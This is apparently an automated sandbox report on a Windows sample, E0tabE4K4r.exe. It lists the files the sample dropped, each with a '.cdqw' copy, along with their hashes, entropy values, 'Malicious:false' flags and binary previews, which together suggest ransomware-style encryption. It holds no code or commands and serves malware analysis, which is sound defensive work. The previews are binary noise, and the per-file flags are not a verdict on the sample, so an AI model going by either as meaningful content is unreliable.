                                                                                                                                                  Preview:TQDGE.1."P\.9.....,....cE...].g....?q5..\u....l....$........K.hS^:V.C...-.]!.U...Z.M..oG.W.'..@....|2-O] ....S).).k....c.h.Z@p&...vCo......F.N?Y.k.^...+bwW3.|..gYz..#{{..p.....F.v=...~M..NC........!WJ...W~...g..Z...LA...<.#*..G.n..E.g....L8b.../.5N..A......C....T.x)|!.'...'!. .A.xz...Oi.FedU. .M..<...}:.9._.E..(......]1,t..Rn..Wp.i..I.y...u._..._g.b.%....%.V..w)W.J'...c.F..e....p.r....&.....c.M{..p.e........[B......jR>..x2X...'E.(....i.Y.._.W.....X.^R.X.(..*(_..p.m.9..7$....|..u.cAZy..9.ww.2.jIB.......^.5W^....&]A.(.....3. .....?#s`..y9DY.\.+0.#.........{{.Q..X.M.b..^..)j......B.....W.T.*>.B........W."...1T..q..G..C....Qak..U..~/fk.u.,.71....%_.N..J..Y$+...4v..]....).z....9Qo..A....@..a.Lz.Q.....A.Z......#/{.]>......[A9...*).w.}8..&.^..}..y..H/....'.t..\4...E[...#P..T..I.Hwl..C.......a..&.k.B.."X..d.f.F..BE.........}.......^.....,.Fb.m..T..}......J.0..t..x.....'..2..g.`":..r.......Tt..r.ZZ._.....&.F.4..f..g.....L#l.6 .V..g....

                                                                                                                                                  C:\Users\user\Downloads\TTCBKWZYOC.png

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.855176057315443
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:yKEQMfoiHhUw9S9G2njxn5BOp53eB97sTALE9rPh2bD:XEQNiH19S9GCJ5EAzI976D
                                                                                                                                                  MD5:B78E38EAA389CCE886A4EF8256ECF275
                                                                                                                                                  SHA1:B91AE78829AC2EFBAA7322ED18F047C16F8B3D92
                                                                                                                                                  SHA-256:B102E8CFC21CAA78830383BD053E65D17DCF1CAEB7237936E887B3CE3D713B21
                                                                                                                                                  SHA-512:1C3CB854FDA8AF6869F17DBBA335247E6426327EFEF5B3A0E3D540EB1AF4690F3C5DAB0512BD5F30D4C8AF80D93C911C87DB70B1498B5069E77A6204D88E1630
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:TTCBK.2....[9..7.3.._....B........5..U!....A.3.V....S...h......*.a.^.kf.XM.m`}..]o...}.3.....:...O=h.... Q5..3.q......p...Ds7.O.^.b.T..n/.5SQv...y.u.p.U+a...z.&s.m....%..Xp..-.)..m............D..?..]b.Z."..q.<a.c~2m...E....."+m..a.0...l.!....i..I..W.;..V.......,u........M{'.2......j..#.....3....,.o...&~g...=).t@L.5.S.Woe....A...>.six..c.....D.X...@...a....../MO...H.+k..$......D.....|..f.sZ}.Abu......A..v..M2.Z..=..Q..H...U.gCn.f>..l...5.....R.P...=..4\..$.....4X..Z\.t..p.z"........W.Pn...5{..q.....X:...&....>..}.Za.*...t@.G.d....@........G.k..Iu...fp(......_{\cS.w.*.}.....3..."Cg.=..L....M...E.3.....b..O.%..=+.N.`X.L....t....V..,.\..s?....gV.j.b.T.p.....%]N..)6.L.j.....K|...tO./.....b.2|..u....no.U.9D.Q\..z..`...'h..-...)....m.!.-1*......i..P.....I.Y....?...a6.u.4"....Q........:.&....c............{&..eg..............*._......IQ...d.........v..7......'.da...4..2z..v.#.....!....u..4..C....'.ElBPV.`.......|..mc....sJ....oC:v.^e...q.

                                                                                                                                                  C:\Users\user\Downloads\TTCBKWZYOC.png.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.855176057315443
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:yKEQMfoiHhUw9S9G2njxn5BOp53eB97sTALE9rPh2bD:XEQNiH19S9GCJ5EAzI976D
                                                                                                                                                  MD5:B78E38EAA389CCE886A4EF8256ECF275
                                                                                                                                                  SHA1:B91AE78829AC2EFBAA7322ED18F047C16F8B3D92
                                                                                                                                                  SHA-256:B102E8CFC21CAA78830383BD053E65D17DCF1CAEB7237936E887B3CE3D713B21
                                                                                                                                                  SHA-512:1C3CB854FDA8AF6869F17DBBA335247E6426327EFEF5B3A0E3D540EB1AF4690F3C5DAB0512BD5F30D4C8AF80D93C911C87DB70B1498B5069E77A6204D88E1630
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:TTCBK.2....[9..7.3.._....B........5..U!....A.3.V....S...h......*.a.^.kf.XM.m`}..]o...}.3.....:...O=h.... Q5..3.q......p...Ds7.O.^.b.T..n/.5SQv...y.u.p.U+a...z.&s.m....%..Xp..-.)..m............D..?..]b.Z."..q.<a.c~2m...E....."+m..a.0...l.!....i..I..W.;..V.......,u........M{'.2......j..#.....3....,.o...&~g...=).t@L.5.S.Woe....A...>.six..c.....D.X...@...a....../MO...H.+k..$......D.....|..f.sZ}.Abu......A..v..M2.Z..=..Q..H...U.gCn.f>..l...5.....R.P...=..4\..$.....4X..Z\.t..p.z"........W.Pn...5{..q.....X:...&....>..}.Za.*...t@.G.d....@........G.k..Iu...fp(......_{\cS.w.*.}.....3..."Cg.=..L....M...E.3.....b..O.%..=+.N.`X.L....t....V..,.\..s?....gV.j.b.T.p.....%]N..)6.L.j.....K|...tO./.....b.2|..u....no.U.9D.Q\..z..`...'h..-...)....m.!.-1*......i..P.....I.Y....?...a6.u.4"....Q........:.&....c............{&..eg..............*._......IQ...d.........v..7......'.da...4..2z..v.#.....!....u..4..C....'.ElBPV.`.......|..mc....sJ....oC:v.^e...q.

                                                                                                                                                  C:\Users\user\Downloads\UMMBDNEQBN.png

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.854968666126271
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:E6gIjmaZnT1HJh5far2P0xDaEGEagMZJrGSfPJED2b7D9jE/KW2p62bD:EWjmadrfa6q0XNJSSK2PpIyXxD
                                                                                                                                                  MD5:757428543D0941A4463ED288663E4C6A
                                                                                                                                                  SHA1:32AABDD0B6114DA109F19381F5C2FD0CB2D71FFE
                                                                                                                                                  SHA-256:751C62E0F125065B9D82AAE579313E15EE94B5AFAC7143FD762A41B69E64B976
                                                                                                                                                  SHA-512:D531E48FF0E224B3A11899C9780D3A92A58402F0A07AA5D924679295AF1E7D72F162A9C246ECD2BAD6A9962C29AA91C0B3A2E2F3A3AD3FDDAFC6D8272479EB01
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:UMMBD....x.bQ.i...6..9.a.'.Q....p{..m.W.?V4......m..<_.....p.p.iF~.L........y.4...Nr......^..4u.\&A.8./,.....n'...../...........=e{......>.....+..j....6/JT....Y0J.....%l..4......._.....%'..-..:^.....$.C.....4...y...~_.K6...!N...v.Tv=]...).Wu...@Y....+@......D.CeC.m0..6uj:..s...2p,7....lR..x..6.e4...?.$....X...>4..}.!.....L..F.s&z..ny.Q..[...GI+...B...@.....z..L)...d........aN>.Bu.].-....N.xs.N6O.....t...?.[i.,....H...\.....YW.n.1.^..T....yi..........c;OT...[m....M.;......r...m.....o.yaB..._Rv.....R.4F..E-..9C.....kg..p. .4...2.M*0...1T..Q.b..y..l..|..2;X.FP..q.xJ....Ej!...xLzM.m.@..b...50......Dy.6...DI:]TK..].....&..........h..xR.S.\.V9.x.\.e:K...k.e*.)..T.].*..yO(1..Pxj........T.G.T..W.Z.S..........nL.^........I#..P%.GW..E.C..@?....#.f........U..~.4R.K.{....3.%...SZ.u`9..)\Qn.Y0.......#.H.....o..}....Wu.5..C]..=..y..l.....:wfU.....0JZp0937.>.k.B..t.l.+~m.Sp7.....m.\..I.F9.....U...@1......Ur.....2...}x.X..)t...kg..........^.h

                                                                                                                                                  C:\Users\user\Downloads\UMMBDNEQBN.png.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.854968666126271
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:E6gIjmaZnT1HJh5far2P0xDaEGEagMZJrGSfPJED2b7D9jE/KW2p62bD:EWjmadrfa6q0XNJSSK2PpIyXxD
                                                                                                                                                  MD5:757428543D0941A4463ED288663E4C6A
                                                                                                                                                  SHA1:32AABDD0B6114DA109F19381F5C2FD0CB2D71FFE
                                                                                                                                                  SHA-256:751C62E0F125065B9D82AAE579313E15EE94B5AFAC7143FD762A41B69E64B976
                                                                                                                                                  SHA-512:D531E48FF0E224B3A11899C9780D3A92A58402F0A07AA5D924679295AF1E7D72F162A9C246ECD2BAD6A9962C29AA91C0B3A2E2F3A3AD3FDDAFC6D8272479EB01
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:UMMBD....x.bQ.i...6..9.a.'.Q....p{..m.W.?V4......m..<_.....p.p.iF~.L........y.4...Nr......^..4u.\&A.8./,.....n'...../...........=e{......>.....+..j....6/JT....Y0J.....%l..4......._.....%'..-..:^.....$.C.....4...y...~_.K6...!N...v.Tv=]...).Wu...@Y....+@......D.CeC.m0..6uj:..s...2p,7....lR..x..6.e4...?.$....X...>4..}.!.....L..F.s&z..ny.Q..[...GI+...B...@.....z..L)...d........aN>.Bu.].-....N.xs.N6O.....t...?.[i.,....H...\.....YW.n.1.^..T....yi..........c;OT...[m....M.;......r...m.....o.yaB..._Rv.....R.4F..E-..9C.....kg..p. .4...2.M*0...1T..Q.b..y..l..|..2;X.FP..q.xJ....Ej!...xLzM.m.@..b...50......Dy.6...DI:]TK..].....&..........h..xR.S.\.V9.x.\.e:K...k.e*.)..T.].*..yO(1..Pxj........T.G.T..W.Z.S..........nL.^........I#..P%.GW..E.C..@?....#.f........U..~.4R.K.{....3.%...SZ.u`9..)\Qn.Y0.......#.H.....o..}....Wu.5..C]..=..y..l.....:wfU.....0JZp0937.>.k.B..t.l.+~m.Sp7.....m.\..I.F9.....U...@1......Ur.....2...}x.X..)t...kg..........^.h

                                                                                                                                                  C:\Users\user\Favorites\Amazon.url

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):445
                                                                                                                                                  Entropy (8bit):7.472771374514298
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:xsU98ibZ+QpVYWvor6jlBTZ/F9iZyMSUdNcii9a:aybZ1pJoujff9iZ22bD
                                                                                                                                                  MD5:BC2E79E753F5B3DC3C1596053FF20A31
                                                                                                                                                  SHA1:18E5659E6029FEE71A3276DAA3302B314B1DEEFB
                                                                                                                                                  SHA-256:C106026851F29209E23F0D77C2049B804E74E7774A575DFB780DBB9EFB4572F5
                                                                                                                                                  SHA-512:DF2B5894C75AFEA9EC9C179E149CEF2FFBF0A091948764859CE5E7AA7096ED88F55C9505733DA5EF02CFED5A3E0B6DD1EA46D4428529C474DC4FA2985A7E7E61
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:[{000.$!R.e.b.9..H..Z..t............x..P..k..D..._.(P.#i...(.j...[DK.,8.*.*..$>c,,}.9...jNY._?SX.....<..;..[.e....U...Vb:(L...z......p=..:..........".K.k.o.;.k/.....T6.fz...&.b.7P....f..._...+.e.......9...v.....l.v.0n1.AK........R.".g)(..=..c...M........bL...x`=......>...Z ..|.X..|....+vpI7.....+V....v.l....;.-*..6.(W&..e.......e-..(....1.v..3.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\Favorites\Amazon.url.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):445
                                                                                                                                                  Entropy (8bit):7.472771374514298
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:xsU98ibZ+QpVYWvor6jlBTZ/F9iZyMSUdNcii9a:aybZ1pJoujff9iZ22bD
                                                                                                                                                  MD5:BC2E79E753F5B3DC3C1596053FF20A31
                                                                                                                                                  SHA1:18E5659E6029FEE71A3276DAA3302B314B1DEEFB
                                                                                                                                                  SHA-256:C106026851F29209E23F0D77C2049B804E74E7774A575DFB780DBB9EFB4572F5
                                                                                                                                                  SHA-512:DF2B5894C75AFEA9EC9C179E149CEF2FFBF0A091948764859CE5E7AA7096ED88F55C9505733DA5EF02CFED5A3E0B6DD1EA46D4428529C474DC4FA2985A7E7E61
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:[{000.$!R.e.b.9..H..Z..t............x..P..k..D..._.(P.#i...(.j...[DK.,8.*.*..$>c,,}.9...jNY._?SX.....<..;..[.e....U...Vb:(L...z......p=..:..........".K.k.o.;.k/.....T6.fz...&.b.7P....f..._...+.e.......9...v.....l.v.0n1.AK........R.".g)(..=..c...M........bL...x`=......>...Z ..|.X..|....+vpI7.....+V....v.l....;.-*..6.(W&..e.......e-..(....1.v..3.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\Favorites\Facebook.url

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):447
                                                                                                                                                  Entropy (8bit):7.497068446402401
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:Vk76JRkuX/tOAWWqm9lQgMKKanBxUC1w5SUdNcii9a:KbS/Iy9lQgN+M2bD
                                                                                                                                                  MD5:5B6FB43A6075E58376612E54518AEE86
                                                                                                                                                  SHA1:E0426F026C6AF26CA372CDD701F65BA23259754E
                                                                                                                                                  SHA-256:57CDF80DDA230E2A5F3C7F9D9993295FCC1D58CDD8B0C9C9672EA3C87FCBAD84
                                                                                                                                                  SHA-512:1A190685F1B0F0708DE5E87B1394DE25442F8D87549E579CDEA9FFE54E9498D387A205017950E7B9F457041247644C1CF4ADD4D08DBE9DA55D4614320B823568
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:[{000&+.2VG.#.r.....|n!W..N...V.Y.....4/...w...".:..Ut.N...9.M.l.B....f.3:..B.]A.(0}.'-..u.......{U0./.I'..i.0./r..g.I...x......./.._..DZJ..a..^..wL.,.Bl.<R..M..W.......kW..a.~..d?..Y..k..a...Ux..k..]./.'@!...K.../.[.=.9..u.V.De.y..;Z?Yvf...C.....hSS....Ax...2.'..yM..)."..?..8.v..u..*?.%-=.A.\.jF...'..}&z..5..0.?+.~myMR...|...B:....._zLl...bI...N.E>#mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\Favorites\Facebook.url.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):447
                                                                                                                                                  Entropy (8bit):7.497068446402401
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:Vk76JRkuX/tOAWWqm9lQgMKKanBxUC1w5SUdNcii9a:KbS/Iy9lQgN+M2bD
                                                                                                                                                  MD5:5B6FB43A6075E58376612E54518AEE86
                                                                                                                                                  SHA1:E0426F026C6AF26CA372CDD701F65BA23259754E
                                                                                                                                                  SHA-256:57CDF80DDA230E2A5F3C7F9D9993295FCC1D58CDD8B0C9C9672EA3C87FCBAD84
                                                                                                                                                  SHA-512:1A190685F1B0F0708DE5E87B1394DE25442F8D87549E579CDEA9FFE54E9498D387A205017950E7B9F457041247644C1CF4ADD4D08DBE9DA55D4614320B823568
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:[{000&+.2VG.#.r.....|n!W..N...V.Y.....4/...w...".:..Ut.N...9.M.l.B....f.3:..B.]A.(0}.'-..u.......{U0./.I'..i.0./r..g.I...x......./.._..DZJ..a..^..wL.,.Bl.<R..M..W.......kW..a.~..d?..Y..k..a...Ux..k..]./.'@!...K.../.[.=.9..u.V.De.y..;Z?Yvf...C.....hSS....Ax...2.'..yM..)."..?..8.v..u..*?.%-=.A.\.jF...'..}&z..5..0.?+.~myMR...|...B:....._zLl...bI...N.E>#mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\Favorites\Live.url

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):443
                                                                                                                                                  Entropy (8bit):7.4278012162429
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:B0cGzekMeK3VCkrwotQ4ZER9vR9WpdLSUdNcii9a:tQekMh4kB29Wpdm2bD
                                                                                                                                                  MD5:DFB4B15AE9B81AC335C96DEF673D8521
                                                                                                                                                  SHA1:14AFECED898787CC30F5AAD31EB46941151178E8
                                                                                                                                                  SHA-256:01117C06B6A77077E83A81511C2282E76FDE7DDEB2F57DCDBEA44C6A2355BA34
                                                                                                                                                  SHA-512:11C1F1EA14D823B11B03C6479664D081F864BB2582C0C4CAEB0FBC938C1F9C90454C1D522FF000093B242031DFF4D04686D7123C7132C3CD4CF3A80A460D8D45
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:[{000._C`w..$...b*D...o...T.fG}A.0+..,<`@.?.x..T..J.....H.a.A)....N..d.Y4.:)F....t...,[..nH.].f.p-d.G.{.(.W3.0<..2..CWm#6......k.i.. Z..............>...3Q7.*3......jWC..! h.x.p.`.-..l;..u.L2bS..................<..SH.[.".....&V.K...Uy..:H*U..l:.LzP.v...1.]X.oM.B...%..lrfu5e--.4...G`..A.G./.wIH.(4.K.b..f.3=..(.].l. .k. ..s.8.xn|s.w...Q.....Yy".dI.5=%samMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\Favorites\Live.url.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):443
                                                                                                                                                  Entropy (8bit):7.4278012162429
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:B0cGzekMeK3VCkrwotQ4ZER9vR9WpdLSUdNcii9a:tQekMh4kB29Wpdm2bD
                                                                                                                                                  MD5:DFB4B15AE9B81AC335C96DEF673D8521
                                                                                                                                                  SHA1:14AFECED898787CC30F5AAD31EB46941151178E8
                                                                                                                                                  SHA-256:01117C06B6A77077E83A81511C2282E76FDE7DDEB2F57DCDBEA44C6A2355BA34
                                                                                                                                                  SHA-512:11C1F1EA14D823B11B03C6479664D081F864BB2582C0C4CAEB0FBC938C1F9C90454C1D522FF000093B242031DFF4D04686D7123C7132C3CD4CF3A80A460D8D45
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:[{000._C`w..$...b*D...o...T.fG}A.0+..,<`@.?.x..T..J.....H.a.A)....N..d.Y4.:)F....t...,[..nH.].f.p-d.G.{.(.W3.0<..2..CWm#6......k.i.. Z..............>...3Q7.*3......jWC..! h.x.p.`.-..l;..u.L2bS..................<..SH.[.".....&V.K...Uy..:H*U..l:.LzP.v...1.]X.oM.B...%..lrfu5e--.4...G`..A.G./.wIH.(4.K.b..f.3=..(.].l. .k. ..s.8.xn|s.w...Q.....Yy".dI.5=%samMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\Favorites\Reddit.url

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):445
                                                                                                                                                  Entropy (8bit):7.374593481658343
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:qLiRfp9t70+hLP1/sKDxEpwvZSUdNcii9a:EURP70+hLP2y02bD
                                                                                                                                                  MD5:54EA414D679978BEEC398549E934D0DB
                                                                                                                                                  SHA1:3724A809853D219B6601E268429AF019B1E5C8CB
                                                                                                                                                  SHA-256:944ECEC07BAB2931C87A74EE76E20B6BD713EDCD1D6C6EA9E0252DAA603E59A3
                                                                                                                                                  SHA-512:B614E9DB8DC1BB977E6798C4FF31149EBE87E4C6645592198877D01F1E74F73D17C4A7871EA9E8204970DCD68829E3F64EABF72409C9253783ACA2841BC7D11F
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:[{000...65....j!4.f..j/...y8.1.T..h...s.4.x.[.P..9CExhR....7U.I...x.]..x.w\....^..Ff&8.1-.. . ...x...$..?.B#...,..j.R4ur.F..7...z5.+.w...fi......K....o...f.6!.C..$.....2.+..#^..K....{.w.....3.Y..K.3.<....]..y.O6..*......(_......d.0..e...T.D.O%......R.lV(.....bx3...2C.....K...._..z`..Qz..b.t?..E..}..*[T0....b..r..4.....{s...k...n.L_p}..L....v..d.....mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\Favorites\Reddit.url.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):445
                                                                                                                                                  Entropy (8bit):7.374593481658343
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:qLiRfp9t70+hLP1/sKDxEpwvZSUdNcii9a:EURP70+hLP2y02bD
                                                                                                                                                  MD5:54EA414D679978BEEC398549E934D0DB
                                                                                                                                                  SHA1:3724A809853D219B6601E268429AF019B1E5C8CB
                                                                                                                                                  SHA-256:944ECEC07BAB2931C87A74EE76E20B6BD713EDCD1D6C6EA9E0252DAA603E59A3
                                                                                                                                                  SHA-512:B614E9DB8DC1BB977E6798C4FF31149EBE87E4C6645592198877D01F1E74F73D17C4A7871EA9E8204970DCD68829E3F64EABF72409C9253783ACA2841BC7D11F
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:[{000...65....j!4.f..j/...y8.1.T..h...s.4.x.[.P..9CExhR....7U.I...x.]..x.w\....^..Ff&8.1-.. . ...x...$..?.B#...,..j.R4ur.F..7...z5.+.w...fi......K....o...f.6!.C..$.....2.+..#^..K....{.w.....3.Y..K.3.<....]..y.O6..*......(_......d.0..e...T.D.O%......R.lV(.....bx3...2C.....K...._..z`..Qz..b.t?..E..}..*[T0....b..r..4.....{s...k...n.L_p}..L....v..d.....mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\Favorites\Wikipedia.url

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):448
                                                                                                                                                  Entropy (8bit):7.503945598722079
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:l6hHFAoDxBt4cu7wah+XZtrolfiLLFSUdNcii9a:l6hPD54ZwaGtwQM2bD
                                                                                                                                                  MD5:7427F87D207DF202F1B49BD22E91245A
                                                                                                                                                  SHA1:E694406050510B546ED6AA9D767530FC1D3FB7A9
                                                                                                                                                  SHA-256:E86CC1296AD794CE63FDCE8D94F5BCEE713CF21E9A7ABD744792984D4B5D9C8C
                                                                                                                                                  SHA-512:5732D042BCF10689AC7F8002511D4B6A25C6A4B4F87742DCFD87F4850A1D2DE64096C386D1CBF110B3826AAC1FE55A86645DE6731BBCED5FC0190A384B5F420A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:[{000m./.s F.!..C(di.#.g3*..7..|.%./d.a....X.......}.C..,K1..Qnf.6\....w.F.5.$!~h.m...yD.S..*h.Y.k.K.i..cd.ml2]..t....d.}..3.:.......`. .../..l..'Z.\...{../...r......F.!..A..K.[.. P...Rl>&....5..p.......!.l.....=.....rj.....Q..I.....t...>....8sD........_e.....{.......q.fSi......LB...#.;[..vo.CZc.=l.W.~F..NJ...V.1Q.=8..M......K..K.....-2D.E$..).\..O.A.BmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\Favorites\Wikipedia.url.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):448
                                                                                                                                                  Entropy (8bit):7.503945598722079
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:l6hHFAoDxBt4cu7wah+XZtrolfiLLFSUdNcii9a:l6hPD54ZwaGtwQM2bD
                                                                                                                                                  MD5:7427F87D207DF202F1B49BD22E91245A
                                                                                                                                                  SHA1:E694406050510B546ED6AA9D767530FC1D3FB7A9
                                                                                                                                                  SHA-256:E86CC1296AD794CE63FDCE8D94F5BCEE713CF21E9A7ABD744792984D4B5D9C8C
                                                                                                                                                  SHA-512:5732D042BCF10689AC7F8002511D4B6A25C6A4B4F87742DCFD87F4850A1D2DE64096C386D1CBF110B3826AAC1FE55A86645DE6731BBCED5FC0190A384B5F420A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:[{000m./.s F.!..C(di.#.g3*..7..|.%./d.a....X.......}.C..,K1..Qnf.6\....w.F.5.$!~h.m...yD.S..*h.Y.k.K.i..cd.ml2]..t....d.}..3.:.......`. .../..l..'Z.\...{../...r......F.!..A..K.[.. P...Rl>&....5..p.......!.l.....=.....rj.....Q..I.....t...>....8sD........_e.....{.......q.fSi......LB...#.;[..vo.CZc.=l.W.~F..NJ...V.1Q.=8..M......K..K.....-2D.E$..).\..O.A.BmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\Local Settings\Adobe\Acrobat\DC\AdobeCMapFnt23.lst.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:PostScript document text
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1567
                                                                                                                                                  Entropy (8bit):7.8753750322645795
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:AWkTgjET1JSrqr/uFzXrqrKghw7+EJliQEpfPRjiWYcjoBCEo2bD:FkTBWrNFOBIlnC2cjofD
                                                                                                                                                  MD5:8441AC890C8BAED25574872D239B5123
                                                                                                                                                  SHA1:E0086826258A30CF0959ABAD7167770C95738A3A
                                                                                                                                                  SHA-256:495708C8E75A433E38783CFBB3B8A959AB7D2D0152F5E8598ABC2312C77FB7E6
                                                                                                                                                  SHA-512:07650A21A8D5D65DB5F3AA3A006AD0EA956991206A9CBE833C950B2811A27E17B065965514CCFE6797EDF6553FAD78A91C185C8A587043C094B16CE29E3C019C
                                                                                                                                                  Malicious:false
